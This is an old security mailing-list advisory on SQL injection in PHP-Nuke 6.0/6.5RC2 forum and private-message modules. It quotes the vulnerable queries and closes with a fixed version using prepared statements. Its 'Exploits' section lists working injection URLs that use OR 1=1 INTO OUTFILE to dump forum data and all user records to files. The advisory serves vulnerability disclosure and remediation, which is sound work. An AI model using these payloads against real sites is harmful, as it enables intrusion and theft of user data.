[VulnWatch] PHP-Nuke 6.0 & 6.5RC2 SQL Injection Again

From: Frog Man (leseulfrog@hotmail.com)
Date: 03/10/03

    From: "Frog Man" <leseulfrog@hotmail.com>
    To: fpc@openmax.com, bugtraq@securityfocus.com, vulnwatch@vulnwatch.org
    Date: Mon, 10 Mar 2003 22:48:22 +0100

    Information :
    °°°°°°°°°°°°°°
    Language : PHP
    Website : http://www.phpnuke.org
    Version : 6.0 & 6.5 RC2
    Modules : Forums, Private_Messages
    Problem : SQL Injection

    PHP Code/Location :
    °°°°°°°°°°°°°°°°°°°
    /modules/Forums/viewtopic.php :

    ------------------------------------------------------------------------
    $sql = "SELECT forum_type, forum_id, forum_pass, forum_name, forum_access,
    forum_moderator, forum_atch FROM ${prefix}_forums WHERE forum_id =
    '$forum'";
    ------------------------------------------------------------------------

    /modules/Forums/viewforum.php :

    ------------------------------------------------------------------------
    $sql = "SELECT f.forum_id, f.forum_type, f.forum_pass, f.forum_name,
    u.uname, u.uid,m.forum_id,m.user_id FROM
    ${prefix}_forums f, ".$user_prefix."_users u, ${prefix}_forum_mods m
    WHERE f.forum_id = '$forum' AND m.forum_id = '$forum' AND m.user_id =
    u.uid";
    ------------------------------------------------------------------------

    /modules/Forums/reply.php :
    ------------------------------------------------------------------------
    $sql = "SELECT forum_name, forum_access, forum_moderator, forum_atch FROM
    ${prefix}_forums WHERE (forum_id = '$forum')";
    ------------------------------------------------------------------------

    /modules/Forums/newtopic.php :
    ------------------------------------------------------------------------
    $sql = "SELECT forum_type, forum_pass, forum_name, forum_access,
    forum_moderator, forum_atch FROM ${prefix}_forums WHERE (forum_id =
    '$forum')";
    ------------------------------------------------------------------------

    /modules/Forums/editpost.php :
    ------------------------------------------------------------------------
    $sql = "SELECT forum_name, forum_access, forum_moderator, forum_atch FROM
    ${prefix}_forums WHERE forum_id = '$forum'";
    ------------------------------------------------------------------------

    /modules/Private_Messages/reply.php :
    ------------------------------------------------------------------------
    if ($reply || $send) {

        if ($uname != "") {
            $res = sql_num_rows(sql_query("select * from ".$user_prefix."_users where
    uname='$uname'", $dbi), $dbi);
    ------------------------------------------------------------------------

    Exploits :
    °°°°°°°°°°
    - This will save forum information into a txt file :
    http://[target]/modules.php?op=modload&name=Forums&file=viewtopic&topic=1&forum=1'%20INTO%20OUTFILE%20'[path/to/site]/vt.txt
    http://[target]/modules.php?op=modload&name=Forums&file=viewforum&forum='%20OR%201=1%20INTO%20OUTFILE%20'[/path]/vf.txt'/*
    http://[target]/modules.php?op=modload&name=Forums&file=reply&forum=1')%20INTO%20OUTFILE%20'[/path]/reply.txt'/*
    http://[target]/modules.php?op=modload&name=Forums&file=newtopic&forum=1')%20INTO%20OUTFILE%20'[/path]/newtopic.txt'/*

    http://[target]/modules.php?op=modload&name=Forums&file=editpost&forum=1'%20INTO%20OUTFILE%20'[/path]/editpost.txt

    etc...

    - This will save all user information into a txt file :

    http://[target]/modules.php?name=Private_Messages&file=reply&send=1&uname='%20OR%201=1%20INTO%20OUTFILE%20'[/path]/users.txt

    Patch :
    °°°°°°°
    A patch can be found on http://www.phpsecure.info

    More Details In French :
    °°°°°°°°°°°°°°°°°°°°°°°°
    http://www.frog-man.org/tutos/PHP-Nuke6.0-Forums-Private_Messages.txt

    frog-m@n
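The same two query shapes with the request values bound instead of interpolated, as an added example (not PHP-Nuke's code and not the phpsecure.info patch); it assumes a mysqli connection and the $prefix / $user_prefix table-prefix names used in the snippets above.

```php
<?php
// Added example, not PHP-Nuke code: the forum_id and uname lookups from the
// advisory rebuilt so that request input never becomes part of the SQL text.
// $prefix and $user_prefix are assumed to come from the site configuration
// (as in PHP-Nuke), not from the request, which is why they may be inlined.

// viewtopic/viewforum/reply/newtopic/editpost all splice $forum straight into
// WHERE forum_id = '$forum'. forum_id is numeric, so the tightest fix is to
// refuse anything that is not an integer before a query is issued at all.
function forum_query(mysqli $db, string $prefix, $forum): ?array
{
    // FILTER_VALIDATE_INT rejects "1' ..." outright instead of silently
    // truncating it to 1 the way a bare (int) cast would.
    $forum_id = filter_var($forum, FILTER_VALIDATE_INT);
    if ($forum_id === false) {
        return null;               // bad input: nothing is sent to MySQL
    }
    $stmt = $db->prepare(
        "SELECT forum_type, forum_id, forum_pass, forum_name, forum_access, "
        . "forum_moderator, forum_atch FROM {$prefix}_forums WHERE forum_id = ?"
    );
    $stmt->bind_param('i', $forum_id);
    $stmt->execute();
    return $stmt->get_result()->fetch_assoc() ?: null;
}

// Private_Messages/reply.php looks the recipient up by uname, which is free
// text and cannot be reduced to an integer; a bound parameter keeps a quote
// inside the value as data rather than as SQL syntax.
function user_exists(mysqli $db, string $user_prefix, string $uname): bool
{
    $stmt = $db->prepare(
        "SELECT COUNT(*) FROM {$user_prefix}_users WHERE uname = ?"
    );
    $stmt->bind_param('s', $uname);
    $stmt->execute();
    return (int) $stmt->get_result()->fetch_row()[0] > 0;
}
```

Either change on its own closes the INTO OUTFILE path shown above for that query; the integer check additionally rejects the request before the database is touched, which makes the attempt visible in the application log rather than only in MySQL.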

